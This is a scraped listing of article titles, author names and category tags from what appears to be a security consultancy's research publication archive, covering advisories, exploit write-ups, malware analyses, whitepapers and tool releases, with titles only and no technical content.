Cisco ASA series part four: dlmalloc-2.8.x, libdlmalloc, & dlmalloc on Cisco ASA
Decoder Improved Burp Suite plugin release part two
Cisco ASA series part three: Debugging Cisco ASA firmware
Managing PowerShell in a modern corporate environment
Cisco ASA series part two: Static analysis & datamining of Cisco ASA firmware
Cisco ASA series part one: Intro to the Cisco ASA
EternalGlue part one: Rebuilding NotPetya to assess real-world resilience
Technical Advisory: Authentication rule bypass
Decoder Improved Burp Suite plugin release part one
Technical advisory: Remote shell commands execution in ttyd
Poison Ivy string decryption
Securing the continuous integration process
Signaturing an Authenticode anomaly with Yara
Analysing a recent Poison Ivy sample
Endpoint connectivity
DeLux Edition: Getting root privileges on the eLux Thin Client OS
UK government cyber security guidelines for connected & autonomous vehicles
Smuggling HTA files in Internet Explorer/Edge
Database Security Brief: The Oracle Critical Patch Update for April 2007
Buffer Underruns, DEP, ASLR and improving the Exploitation Prevention Mechanisms (XPMs) on the Windows platform
Data-mining with SQL Injection and Inference
The Pharming Guide – Understanding and preventing DNS related attacks by phishers
Weak Randomness Part I – Linear Congruential Random Number Generators
Exploiting PL/SQL Injection Flaws with only CREATE SESSION Privileges
Blind Exploitation of Stack Overflow Vulnerabilities
Slotting Security into Corporate Development
Creating Arbitrary Shellcode In Unicode Expanded Strings
Violating Database – Enforced Security Mechanisms
Hacking the Extensible Firmware Interface
Advanced Exploitation of Oracle PL/SQL Flaws
Firmware Rootkits: The Threat to the Enterprise
Database Security: A Christmas Carol
Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server
Non-flood/non-volumetric Distributed Denial of Service (DDoS)
VoIP Security Methodology and Results
E-mail Spoofing and CDONTS.NEWMAIL
Dangling Cursor Snarfing: A New Class of Attack in Oracle
Database Servers on Windows XP and the unintended consequences of simple file sharing
DNS Pinning and Web Proxies
Technical advisory: CVE-2017-8592 – XMLHttpRequest in IE followed 307 redirections with additional or customised headers
Which database is more secure? Oracle vs. Microsoft
Variations in Exploit methods between Linux and Windows
Using graph databases to assess the security of thingernets based on the thingabilities and thingertivity of things
Live Incident Blog: June Global Ransomware Outbreak
Beyond data loss prevention
How to protect yourself & your organisation from phishing attacks
Rise of the machines: Machine Learning & its cyber security applications
Combating Java Deserialisation Vulnerabilities with Look-Ahead Object Input Streams (LAOIS)
A WarCon 2017 Presentation: Cisco ASA – Exploiting the IKEv1 Heap Overflow – CVE-2016-1287
Latest threats to the connected car & intelligent transport ecosystem
Network Attached Security: Attacking a Synology NAS
Accessing Private Fields Outside of Classes in Java
Understanding the insider threat & how to mitigate it
Matty McMattface: Security implications, mitigations & testing strategies for biometric facial recognition systems
Setting a New Standard for Kubernetes Deployments
Encryption at rest: Not the panacea to data protection
Applying normalised compression distance for architecture classification
Microsoft Zero-Day Vulnerability – OLE2Link – Threat Intelligence and Signatures
D-LINK DIR-850L web admin interface vulnerable to stack-based buffer overflow
Fix Bounty
Unauthenticated XML eXternal Entity (XXE) vulnerability
General Data Protection Regulation: Knowing your data
Technical Advisory: Shell Injection in MacVim mvim URI Handler
Technical Advisory: Shell Injection in SourceTree
SCOMplicated? – Decrypting SCOM “RunAs” credentials
Technical Advisory: Multiple Vulnerabilities in Accellion File Transfer Appliance
ISM RAT
Mergers & Acquisitions (M&A) cyber security due diligence
Advisory-CraigSBlackie-CVE-2016-9795
Best practices with BYOD
Technical Advisory: Nexpose Hard‐coded Java Key Store Passphrase Allows Decryption of Stored Credentials
Compromising Apache Tomcat via JMX access
Berserko: Kerberos Authentication for Burp Suite
Java RMI Registry.bind() Unvalidated Deserialization
NCC CON Europe 2017
Understanding cyber risk management vs uncertainty with confidence in 2017
iOS MobileSlideShow USB Image Class arbitrary code execution.txt
Denial of Service in Parsing a URL by ierutil.dll
U plug, we play
SSL checklist for pentesters
Dissecting social engineering attacks
External Enumeration and Exploitation of Email and Web Security Solutions
Social Engineering
Phishing Stories
Automating extraction from malware and recent campaign analysis
DDoS Common Approaches and Failings
Absolute Security
How much training should staff have on cyber security?
USB under the bonnet: Implications of USB security vulnerabilities in vehicle systems
Cyber Essentials Scheme
Webinar – PCI Version 3.0: Are you ready?
Webinar: 4 Secrets to a Robust Incident Response Plan
Cloud Security Presentation
Webinar: SMACK, SKIP-TLS & FREAK SSL/TLS vulnerabilities
Revealing Embedded Fingerprints: Deriving intelligence from USB stack interactions
Memory Gap
44Con2013Game
creep-web-app-scanner
ncccodenavi
Pip3line
typofinder
DIBF – Updated
IODIDE
CECSTeR
cisco-SNMP-enumeration
dotnetpaddingoracle
dotnetpefuzzing
easyda
EDIDFuzzer
Fat-Finger
firstexecution
grepify
FrisbeeLite
State-of-the-art email risk
Ransomware: what organisations can do to survive
hostresolver
lapith
metasploitavevasion
Maritime Cyber Security: Threats and Opportunities
IP-reputation-snort-rule-generator
The L4m3ne55 of Passw0rds: Notes from the field
Mature Security Testing Framework
Exporting non-exportable RSA keys
Black Hat USA 2015 presentation: Broadcasting your attack-DAB security
The role of security research in improving cyber security
Self-Driving Cars- The future is now…
They Ought to Know Better: Exploiting Security Gateways via their Web Interfaces
Mobile apps and security by design
The Myth of Twelve More Bytes: Security on the Post-Scarcity Internet
When Security Gets in the Way: PenTesting Mobile Apps That Use Certificate Pinning
USB Undermining Security Barriers:further adventures with USB
Software Security Austerity Security Debt in Modern Software Development
RSA Conference – Mobile Threat War Room
Finding the weak link in binaries
To dock or not to dock, that is the question: Using laptop docking stations as hardware-based attack platforms
Harnessing GPUs Building Better Browser Based Botnets
The Browser Hacker’s Handbook
SQL Server Security
The Database Hacker’s Handbook
Social Engineering Penetration Testing
Public Report – Matrix Olm Cryptographic Review
Research Insights Volume 8 – Hardware Design: FPGA Security Risks
Zcash Cryptography and Code Review
Optimum Routers: Researching Managed Routers
Peeling back the layers on defence in depth…knowing your onions
End-of-life pragmatism
iOS Instrumentation Without Jailbreak
The Password is Dead, Long Live the Password!
Microsoft Office Memory Corruption Vulnerability
Windows 10 USB Mass Storage driver arbitrary code execution in kernel mode
Elephant in the Boardroom Survey 2016
A Peek Behind the Great Firewall of Russia
Avoiding Pitfalls Developing with Electron
Flash local-with-filesystem Bypass in navigateToURL
D-Link routers vulnerable to Remote Code Execution (RCE)
iOS Application Security: The Definitive Guide for Hackers and Developers
The Mobile Application Hacker’s Handbook
Research Insights Volume 9 – Modern Security Vulnerability Discovery
Post-quantum cryptography overview
The CIS Security Standard for Docker available now
An adventure in PoEKmon NeutriGo land
The Shellcoder’s Handbook: Discovering and Exploiting Security Holes, 2nd Edition
How will GDPR impact your communications?
Potential false redirection of web site content in Internet in SAP NetWeaver web applications
Multiple security vulnerabilities in SAP NetWeaver BSP Logon
The Automotive Threat Modeling Template
My name is Matt – My voice is my password
Ransomware: How vulnerable is your system?
NCC Group WhitepaperUnderstanding and HardeningLinux ContainersJune 29, 2016 – Version 1.1
My Hash is My Passport: Understanding Web and Mobile Authentication
Project Triforce: Run AFL on Everything!
Writing Exploits for Win32 Systems from Scratch
How to Backdoor Diffie-Hellman
Local network compromise despite good patching
Sakula: an adventure in DLL planting
When a Trusted Site in Internet Explorer was Anything But
GSM/GPRS Traffic Interception for Penetration Testing Engagements
An Adaptive-Ciphertext Attack Against “I ⊕ C” Block Cipher Modes With an Oracle
Creating a Safer OAuth User Experience
Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
Aurora Response Recommendations
Blind Security Testing – An Evolutionary Approach
Building Security In: Software Penetration Testing
Cleaning Up After Cookies
Command Injection in XML Signatures and Encryption
Common Flaws of Distributed Identity and Authentication Systems
Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
Developing Secure Mobile Applications for Android
Exposing Vulnerabilities in Media Software
Hunting SQL Injection Bugs
IAX Voice Over-IP Security
ProxMon: Automating Web Application Penetration Testing
iSEC’s Analysis of Microsoft’s SDL and its ROI
Secure Application Development on Facebook
Secure Session Management With Cookies for Web Applications
Security Compliance as an Engineering Discipline
Weaknesses and Best Practices of Public Key Kerberos with Smart Cards
Exploiting Rich Content
HTML5 Security The Modern Web Browser Perspective
An Introduction to Authenticated Encryption
Attacks on SSL
Content Security Policies Best Practices
Windows Phone 7 Application Security Survey
Browser Extension Password Managers
Introducing idb-Simplified Blackbox iOS App Pentesting
Login Service Security
The factoring dead: Preparing for the cryptopocalypse
Auditing Enterprise Class Applications and Secure Containers on Android
Early CCS Attack Analysis
Analysis of Boomerang Differential Trials via a SAT-Based Constraint Solver URSA
Perfect Forward Security
Internet of Things Security
Secure Messaging for Normal People
Understanding and Hardening Linux Containers
Adventures in Windows Driver Development: Part 1
Private sector cyber resilience and the role of data diodes
From CSV to CMD to qwerty
General Data Protection Regulation – are you ready?
Business Insights: Cyber Security in the Financial Sector
The Importance of a Cryptographic Review
osquery Application Security Assessment Public Report
Sysinternals SDelete: When Secure Delete Fails
Ricochet Security Assessment Public Report
Breaking into Security Research at NCC Group
Building Systems from Commercial Components
Modernizing Legacy Systems: Software Technologies, Engineering Processes, and Business Practices
Secure Coding in C and C++
CERT Oracle Secure Coding Standard for Java
CERT C Secure Coding Standard
Java Coding Guidelines: 75 Recommendations for Reliable and Secure Programs
Professional C Programming LiveLessons, (Video Training) Part I: Writing Robust, Secure, Reliable Code
Secure Coding in C and C++, 2nd Edition
The CERT® C Coding Standard, Second Edition: 98 Rules for Developing Safe, Reliable, and Secure Systems
Secure Coding Rules for Java LiveLessons, Part 1
Hacking Displays Made Interesting
What the HEC? Security implications of HDMI Ethernet Channel and other related protocols
44CON Workshop – How to assess and secure iOS apps
Payment Card Industry Data Security Standard (PCI DSS) A Navigation and Explanation of Changes from v2.0 to v3.0
Mobile World Congress – Mobile Internet of Things
Practical SME security on a shoestring
BlackHat Asia USB Physical Access
How we breach network infrastructures and protect them
Hacking a web application
Batten down the hatches: Cyber threats facing DP operations
Threats and vulnerabilities within the Maritime and shipping sectors
Distributed Ledger (Blockchain) Security and Quantum Computing Implications
Abusing Privileged and Unprivileged Linux Containers
A few notes on usefully exploiting libstagefright on Android 5.x
NCC Con Europe 2016
Remote Exploitation of Microsoft Office DLL Hijacking (MS15-132) via Browsers
Phishing Mitigations: Configuring Microsoft Exchange to Clearly Identify External Emails
Car Parking Apps Vulnerable To Hacks
eBook – Do you know how your organisation would react in a real-world attack scenario?
Erlang Security 101
SysAid Helpdesk blind SQL injection
SysAid Helpdesk stored XSS
Virtual Access Monitor Multiple SQL Injection Vulnerabilities
Whatsupgold Premium Directory traversal
Windows remote desktop memory corruptoin leading to RCE on XPSP3
Windows USB RNDIS driver kernel pool overflow
Drones: Detect, Identify, Intercept, and Hijack
Introducing Chuckle and the Importance of SMB Signing
Threat Intelligence: Benefits for the Enterprise
Best Practices for the use of Static Code Analysis within a Real-World Secure Development Lifecycle
Secure Device Manufacturing: Supply Chain Security Resilience
eBook – Planning a robust incident response process
HDMI Ethernet Channel
Advanced SQL Injection in SQL Server Applications
USB keyboards by post – use of embedded keystroke injectors to bypass autorun restrictions on modern desktop operating systems
ASP.NET Security and the Importance of KB2698981 in Cloud Environments
Xen HYPERVISOR_xen_version stack memory revelation
Windows Remote Desktop Memory Corruption Leading to RCE on XPSP3
SysAid Helpdesk Pro – Blind SQL Injection
Symantec Messaging Gateway SSH with backdoor user account + privilege escalation to root due to very old Kernel
Symantec Messaging Gateway Out of band stored XSS delivered by email
Symantec Messaging Gateway Easy CSRF to add a backdoor-administrator (for example)
Symantec Messaging Gateway Arbitrary file download is possible with a crafted URL (authenticated)
Symantec Backup Exec 2012 – Persistent XSS Vulnerability Affecting Custom Reports
Symantec Backup Exec 2012 – OS version and service pack information leak
Symantec Backup Exec 2012 – Linux Backup Agent Heap Overflow
Symantec Backup Exec 2012 Backup/Restore Data Traverses Memory with Weak ACLs
Symantec Backup Exec 2012 – Backup Exec Utility Stored XSS when adding Groups, Servers and Computers
Squiz CMS File Path Traversal
Solaris 11 USB Hub Class descriptor kernel stack overflow
SmarterMail – Stored XSS in emails
Remote code execution in ImpressPages CMS
OS X 10.6.6 Camera Raw Library Memory Corruption
Oracle Java Installer Adds a System Path Which is Writable by All
Oracle Hyperion 11 Directory Traversal
Oracle E-Business Suite Pre-Auth SQLi with DBA Privileges
Nessus Authenticated Scan – Local Privilege Escalation
NCC Group Malware Technical Note
Nagios XI Network Monitor – Stored and Reflective XSS
Multiple Vulnerabilities in MailEnable
Microsoft Internet Explorer CMarkup Use-After-Free
McAfee Email and Web Security Appliance v5.6 – Session hijacking (and bypassing client-side session timeouts)
McAfee Email and Web Security Appliance v5.6 – Password hashes can be recovered from a system backup and easily cracked
McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is possible with a crafted URL, when logged in as any user
McAfee Email and Web Security Appliance v5.6 – Any logged-in user can bypass controls to reset passwords of other administrators
McAfee Email and Web Security Appliance v5.6 – Active session tokens of other users are disclosed within the UI
iOS 7 arbitrary code execution in kernel mode
Understanding Microsoft Word OLE Exploit Primitives
Understanding Microsoft Word OLE Exploit Primitives: Exploiting CVE-2015-1642 Microsoft Office CTaskSymbol Use-After-Free Vulnerability
Porting the Misfortune Cookie Exploit: A Look into Router Exploitation Using the TD-8817
Vehicle Emissions and Cyber Security
Research Insights Volume 6: Common Issues with Environment Breakouts
Does TypeScript Offer Security Improvements Over JavaScript?
Common Security Issues in Financially-Oriented Web Applications
Research Insights Volume 3 – How are we breaking in: Mobile Security
Build Your Own Wi-Fi Mapping Drone Capability
Exploiting CVE-2015-2426, and How I Ported it to a Recent Windows 8.1 64-bit
Exploiting MS15-061 Use-After-Free Windows Kernel Vulnerability
Password and brute-force mitigation policies
Understanding Ransomware: Impact, Evolution and Defensive Strategies
libtalloc: A GDB plugin for analysing the talloc heap
Lumension Device Control (formerly Sanctuary) remote memory corruption
LibAVCodec AMV Out of Array Write
Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass
Flash security restrictions bypass: File upload by URLRequest
Immunity Debugger Buffer Overflow
DataArmor Full Disk Encryption 3.0.12c – Restricted Environment breakout, Privilege Escalation and Full Disk Decryption
Cups-filters remote code execution
Critical Risk Vulnerability in SAP Message Server (Heap Overflow)
Critical Risk Vulnerability in SAP DB Web Server (Stack Overflow)
Critical Risk Vulnerability in Ingres (Pointer Overwrite 2)
Critical Risk Vulnerability in Ingres (Pointer Overwrite 1)
Cisco VPN Client Privilege Escalation
Cisco IPSec VPN Implementation Group Name Enumeration
Blue Coat BCAAA Remote Code Execution Vulnerability
BlackBerry Link WebDav Server Bound to the BlackBerry VPN Adapter
Bit51 Better Security WP Security Plugin – Unauthenticated Stored XSS to RCE
Back Office Web Administration Authentication Bypass
AtHoc Toolbar
ASE 12.5.1 datatype overflow
Archived Technical Advisories
Apple QuickTime Player m4a Processing Buffer Overflow
Apple OSX/iPhone iOS ImageIO TIFF getBandProcTIFF TileWidth Heap Overflow
Apple Mac OS X ImageIO TIFF Integer Overflow
Apple CoreAnimation Heap Overflow
Writing Small Shellcode
Writing Secure ASP Scripts
Windows 2000 Format String Vulnerabilities
The Pentesters Guide to Akamai
Adobe flash sandbox bypass to navigate to local drives
Adobe Flash Player Cross Domain Policy Bypass
Adobe Acrobat Reader XML Forms Data Format Buffer Overflow
Tool Release: Introducing opinel: Scout2’s favorite tool
Broadcasting your attack – DAB security
Modelling Threat Actor Phishing Behaviour
Research Insights Volume 7: Exploitation Advancements
Exploiting the win32k!xxxEnableWndSBArrows use-after-free (CVE-2015-0057) bug on both 32-bit and 64-bit
The Demise of Signature Based Antivirus
Stopping Automated Attack Tools
Security of Things: An Implementers’ Guide to Cyber-Security for Internet of Things Devices and Beyond
Security Best Practice: Host Naming & URL Conventions
Securing PL/SQL Applications with DBMS_ASSERT
Second-Order Code Injection Attacks
Revealing Embedded Fingerprints: Deriving Intelligence from USB Stack Interactions 2013
Research Insights Volume 4 – Sector Focus: Maritime Sector
Research Insights Volume 2 – Defensive Trends
Research Insights Volume 1 – Sector Focus: Financial Services
Quantum Cryptography – A Study Into Present Technologies and Future Applications
Protecting stored cardholder data (an unofficial supplement to PCI DSS V3.0)
Preparing for Cyber Battleships – Electronic Chart Display and Information System Security
Passive Information Gathering – The Analysis of Leaked Network Security Information
Oracle Passwords and OraBrute
Oracle Forensics Part 7 Using the Oracle System Change Number in Forensic Investigations
Oracle Forensics Part 6: Examining Undo Segments, Flashback and the Oracle Recycle Bin
Oracle Forensics Part 5: Finding Evidence of Data Theft in the Absence of Auditing
Oracle Forensics Part 4: Live Response
Oracle Forensics Part 3: Isolating Evidence of Attacks Against the Authentication Mechanism
Oracle Forensics Part 2: Locating Dropped Objects
Oracle Forensics Part 1: Dissecting the Redo Logs
Non-stack Based Exploitation of Buffer Overrun Vulnerabilities on Windows NT 2000 XP
New Attack Vectors and a Vulnerability Dissection of MS03-007
More Advanced SQL Injection
Microsoft’s SQL Server vs. Oracle’s RDBMS
Microsoft SQL Server Passwords
Low Cost Attacks on Smart Cards – The Electromagnetic Side-Channel
Lessons learned from 50 bugs: Common USB driver vulnerabilities
Inter-Protocol Exploitation
Inter-Protocol Communication
Improving your Network and Application Assurance Strategy in an environment of increasing 0day vulnerabilities
Implementing and Detecting a PCI Rootkit
How organisations can properly configure SSL services to ensure the integrity and confidentiality of data in transit
Hackproofing Oracle Application Server
Hackproofing MySQL
Hackproofing Lotus Domino Web Server
Hacking Appliances: Ironic exploits in security products
Fuzzing USB devices using Frisbee Lite
HDMI – Hacking Displays Made Interesting
Exploiting Security Gateways Via Web Interfaces
Research Insights Volume 5 – Sector Focus: Automotive
The why behind web application penetration test prerequisites
Blackbox iOS App Assessments Using idb
Cyber red-teaming business-critical systems while managing operational risk
Blind Return Oriented Programming
Username enumeration techniques and their value
IAM user management strategy (part 2)
Faux Disk Encryption: Realities of Secure Storage On Mobile Devices
Some Notes About the Xen XSA-122 Bug
USB attacks need physical access right? Not any more…
Image IO Memory Corruption
Threat Profiling Microsoft SQL Server
Thin Clients: Slim Security
Impress Pages CMS Remote Code Execution
The Phishing Guide: Understanding & Preventing Phishing Attacks
Lumension Device Control Remote Memory Corruption
McAfee Email and Web Security Appliance Active session tokens of other users are disclosed within the UI
McAfee Email and Web Security Appliance Any logged-in user can bypass controls to reset passwords of other administrators
Bypassing Oracle DBMS_ASSERT (in certain situations)
McAfee Email and Web Security Appliance Arbitrary file download is possible with a crafted URL, when logged in as any user
McAfee Email and Web Security Appliance Password hashes can be recovered from a system backup and easily cracked
McAfee Email and Web Security Appliance Reflective XSS allowing an attacker to gain session tokens
McAfee Email and Web Security Appliance Session hijacking and bypassing client-side session timeouts
Medium Risk Vulnerability in Symantec Enterprise Security Management
Medium Risk Vulnerability in Symantec Network Access Control
Nagios XI Network Monitor Stored and Reflected XSS
NX Server for Linux Arbitrary Files can be read with root privileges
Oracle 11g TNS listener remote Invalid Pointer Read
Oracle 11g TNS listener remote Null Pointer Dereference
Oracle Retail Integration Bus Manager Directory Traversal
Oracle Retail Invoice Manager SQL Injection
OS X Lion USB Hub Class Descriptor Arbitrary Code Execution
PRTG Network Monitor Command injection
Samba Andx Request Remote Code Execution
Samba on the BlackBerry PlayBook
Solaris 11 USB hubclass
Symantec Message Filter Session Hijacking via session
Symantec Message Filter Unauthenticated verbose software version information disclosure
Symantec Messaging Gateway – Addition of a backdoor adminstrator via CSRF
Symantec Messaging Gateway – Authenticated arbritary file download
Symantec Messaging Gateway – Out of band stored XSS via email
Symantec Messaging Gateway – Unauthenticated detailed version disclosure
Symantec Messaging Gateway – Unauthorised SSH access
Symantec PC Anywhere Remote Code Extecution
Adam Roberts
Anthony Ferrillo
Aaron Greetham
Aaron Haymore
Aleksandar Kircanski
Alessandro Fanio Gonzalez
Alessandro Fanio González
Alex Plaskett
Alvaro Martin Fraguas
Álvaro Martín Fraguas
Andrea Shirley-Bellande
Drew Wade
Andy Davis
Andy Grant
Antonis Terefos
anvesh3752
Alexander Smye
aschmitz
Author Test
Ava Howell
Andrew Whistlecroft
balazs.bucsay
Nicolas Bidron
NCC Group Physical Breach Team
Rich Warren
Caleb Watt
Clinton Carpene
Cedric Halbronn
chrisanley
Christo Butcher
Clayton Lowell
Clint Gibler
Contributor Test
corancc
Corey Arthur
Christian Powills
Craig Blackie
Catalin Visinescu
Ken Wolstencroft
Dale Pavey
Damon Small
Dan Hastings
Dave G.
David Tulis
David Cash
Daniele Costa
destoken
Diana Dragusin
Diego Gomez Maranon
Diego Gómez Marañon
Domen Puncer Kugler
Daniel Romero
David Young
Edward Torkington
Exploit Development Group
elenabakoslang
Eli Sohl
epliuncc
Erik Schamper
Erik Steringer
Eric Schorn
fernandogallegopinero
Aaron Adams
Gavin Cotter (Temp)
Gerald Doussot
Gérald Doussot
Giacomo Pope
Global Threat Intelligence
Guy Morley
William Handy
Liew hock lai
Hollie Mowatt
Heather Overcash
Rob Wood
Iain Smart
Izzy Whistlecroft
Jacob Heath
Jameson Hyde
Phillip Langlois and Edward Torkington
Jashan Benawra
Jason Kielpinski
Javed Samuel
James Chambers
Jelle Vergeer
Jennifer Reed
Jeremy Boone
Jerome Smith
Jesus Calderon Marin
Jesús Calderón Marín
Jack Leadford
Joshua Makinen
John Redford
Joost Jansen
Joshua Dow
Jose Selvi
Kenneth Yu
Kat Sommer
Katarina Dabler
Ben Lister
Krijn de Mik
Lars Behrens
Lawrence Munro
Liam Glanfield
Liam Stevenson
Liyun Li
Lucas Rosevear
Luke Paris
Matt Lewis
Manuel Gines
Margit Hazenbroek
Marie-Sarah Lacharite
Mario Rivas
NCC Group & Fox-IT Data Science Team
Max Groot
McCaulay Hudson
Michael Gough
Mostafa Hassan
Matthew Pettitt
Frank Gifford
Michelle Simpson
Neil Bergman
NCC Group
NCC Group Publication Archive
Bill Marquette
Daniel Lopezjimenez
nccdavid
Dan Helton
RIFT: Research and Intelligence Fusion Team
nccgresearchrr
NCC Group Red Team
Ilya Zhuravlev
Jennifer Fernick
ncckai
Lewis Lockwood
Jon Szymaniak
Mark Manning
nccmarktedman
Michael Sandee
Simon Palmer
nccricardomr
Stefano Antenucci
Simone Salucci and Daniel Lopez Jimenez
Samuel Siu
Tanner Prynn
Yun Zheng Hu
Stephen Tomkinson
Nicolas Guigo
Nick Galloway
Nick Muir
Nick Dunn
Nick Sirris
Nikolaos Pantazopoulos
Oliver Brooks
Ollie Whitehouse
Ollie Wen
Parnian Alimi
Paul Bottinelli
Peter Scopes
Peter Hannay
philipmarsdennccgroupcom
Pixel Kicks
Pixel Kicks
pixelkicks-fiona
pixelkicks-fred
pixelkicks-matt.hamer
pixelkicks-turhan
pixelkicks-will
pqueenncc
Philipp Schaefer
qkchambers
Rory McCune
Rami McCarthy
Ray Lai
Robert C. Seacord
Rennie deGraaf
Chris Nevin
Richard Appleby
Rick Veldhoven
Fumik0_
Rindert Kramer
Rob Ince
robertgrimes123
Robert Wessen
Robert Schwass
sampeate
Roger Meyer
schlopeckincc
Siddarth Adukia
Sam Leonard (they/them)
Spencer Michaels
Sander de Jong
Stuart Kurutac
Subscriber Test
Sultan Khan
Swathi Nagarajan
Simon Watson
Jeff Dileo
Thomas Marshall
Ivan Reedman
Thomas Pornin
Jeremy Boone
Viktor Gazdag
Vishtasp Jokhi
Wouter Jansen
William Groesbeck
whoughtonncc
Wordpress SSO Test
Xavier Garceau-Aranda
Ken Gannon
Kevin Henry
5G Security & Smart Environments
Academic Partnership
Annual Research Report
Asia Pacific Research
Awards & Recognition
Books
Business Insights
Cloud & Containerization
Cloud Security
Conferences
Corporate
Cryptography
CTFs/Microcorruption
Current events
Cyber as a Science
Cyber Security
Detection and Threat Hunting
Disclosure Policy
Emerging Technologies
Engineering
Fox-IT
Fox-IT and European Research
Gaming & Media
Hardware & Embedded Systems
Intern Projects
iSec Partners
Machine Learning
Managed Detection & Response
Misinformation, Deepfakes, & Synthetic Media
North American Research
Offensive Security & Artificial Intelligence
Patch notifications
Presentations
protocol_name
Public interest technology
Public Report
Public tools
Reducing Vulnerabilities at Scale
Research
Research Paper
Reverse Engineering
Risk Management & Governance
Standards
Technical advisories
Technology Policy
Threat briefs
Threat Intelligence
Tool Release
Transport
Tutorial/Study Guide
UK Research
Uncategorized
Virtualization, Emulation, & Containerization
Vulnerability
Whitepapers
Stepping Insyde System Management Mode
Breaking Pedersen Hashes in Practice
A Race to Report a TOCTOU: Analysis of a Bug Collision in Intel SMM
Making New Connections – Leveraging Cisco AnyConnect Client to Drop and Run Payloads
A Primer On Slowable Encoders
Threat Spotlight – Hydra
Rustproofing Linux (Part 4/4 Shared Memory)
Rustproofing Linux (Part 3/4 Integer Overflows)
Security Code Review With ChatGPT
Rustproofing Linux (Part 2/4 Race Conditions)
Readable Thrift
Building WiMap the Wi-Fi Mapping Drone
Building WiMap the Wi-Fi Mapping Drone
Fuzzing the Easy Way Using Zulu
Fuzzing the Easy Way Using Zulu
Exploiting CVE-2014-0282
Exploiting CVE-2014-0282
Rustproofing Linux (Part 1/4 Leaking Addresses)
Machine Learning 102: Attacking Facial Authentication with Poisoned Data
Threat Modelling Cloud Platform Services by Example: Google Cloud Storage
Using Semgrep with Jupyter Notebook files
Announcing NCC Group’s Cryptopals Guided Tour: Set 2
Technical Advisory – U-Boot – Unchecked Download Size and Direction in USB DFU (CVE-2022-2347)
Technical Advisory – Multiple Vulnerabilities in the Galaxy App Store (CVE-2023-21433, CVE-2023-21434)
Project Bishop: Clustering Web Pages
Puckungfu: A NETGEAR WAN Command Injection
MeshyJSON: A TP-Link tdpServer JSON Stack Overflow
Machine Learning 101: The Integrity of Image (Mis)Classification?
Replicating CVEs with KLEE
Public Report – VPN by Google One Security Assessment
Public Report – Confidential Space Security Review
Exploring Prompt Injection Attacks
Impersonating Gamers With GPT-2
So long and thanks for all the 0day
A jq255 Elliptic Curve Specification, and a Retrospective
Technical Advisory – NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163)
Tool Release – Web3 Decoder Burp Suite Extension
Tales of Windows detection opportunities for an implant framework
Check out our new Microcorruption challenges!
Toner Deaf – Printing your next persistence (Hexacon 2022)
Technical Advisory – OpenJDK – Weak Parsing Logic in java.net.InetAddress and Related Classes
Public Report – IOV Labs powHSM Security Assessment
Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and CSF Tampering on NXP i.MX Devices
A glimpse into the shadowy realm of a Chinese APT: detailed analysis of a ShadowPad intrusion
Detecting Mimikatz with Busylight
Whitepaper – Project Triforce: Run AFL On Everything (2017)
Tool Release – Project Kubescout: Adding Kubernetes Support to Scout Suite
Technical Advisory – Multiple Vulnerabilities in Juplink RX4-1800 WiFi Router (CVE-2022-37413, CVE-2022-37414)
A Guide to Improving Security Through Infrastructure-as-Code
Tool Release – ScoutSuite 5.12.0
Public Report – Penumbra Labs Decaf377 Implementation and Poseidon Parameter Selection Review
Tool Release – Monkey365
Sharkbot is back in Google Play
Constant-Time Data Processing At a Secret Offset, Privacy and QUIC
There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities
Conference Talks – September/October 2022
SETTLERS OF NETLINK: Exploiting a limited UAF in nf_tables (CVE-2022-32250)
Writing FreeBSD Kernel Modules in Rust
NCC Con Europe 2022 – Pwn2Own Austin Presentations
Tool Release – JWT-Reauth
Back in Black: Unlocking a LockBit 3.0 Ransomware Attack
Wheel of Fortune Outcome Prediction – Taking the Luck out of Gambling
Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study
Implementing the Castryck-Decru SIDH Key Recovery Attack in SageMath
Top of the Pops: Three common ransomware entry techniques
NCC Group Research at Black Hat USA 2022 and DEF CON 30
Tool Release – insject: A Linux Namespace Injector
Technical Advisory – Multiple vulnerabilities in Nuki smart locks (CVE-2022-32509, CVE-2022-32504, CVE-2022-32502, CVE-2022-32507, CVE-2022-32503, CVE-2022-32510, CVE-2022-32506, CVE-2022-32508, CVE-2022-32505)
NIST Selects Post-Quantum Algorithms for Standardization
Climbing Mount Everest: Black-Byte Bytes Back?
Five Essential Machine Learning Security Papers
Whitepaper – Practical Attacks on Machine Learning Systems
Flubot: the evolution of a notorious Android Banking Malware
A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would have prevented
Technical Advisory – ExpressLRS vulnerabilities allow for hijack of control link
Updated: Technical Advisory and Proofs of Concept – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552)
Understanding the Impact of Ransomware on Patient Outcomes – Do We Know Enough?
Public Report – Threshold ECDSA Cryptography Review
Exception Handling and Data Integrity in Salesforce
Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328, CVE-2022-30329)
Shining the Light on Black Basta
Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552)
NCC Group’s Jeremy Boone recognized for Highest Quality and Most Eligible Reports through the Intel Circuit Breaker program
Conference Talks – June 2022
Hardware Security By Design: ESP32 Guidance
Public Report – Lantern and Replica Security Assessment
NCC Group’s Juan Garrido named to Microsoft’s MSRC Office Security Researcher Leaderboard
Technical Advisory – FUJITSU CentricStor Control Center <= V8.1 – Unauthenticated Command Injection ( CVE-2022-31794 and CVE-2022-31795)
Public Report – go-cose Security Assessment
Technical Advisory – SerComm h500s – Authenticated Remote Command Execution (CVE-2021-44080)
Metastealer – filling the Racoon void
earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s decompiler internals to make automatic P-Code analysis scripts
Tool Release – Ghostrings
Technical Advisory – Kwikset/Weiser BLE Proximity Authentication in Kevo Smart Locks Vulnerable to Relay Attacks
Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to Relay Attacks
Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks
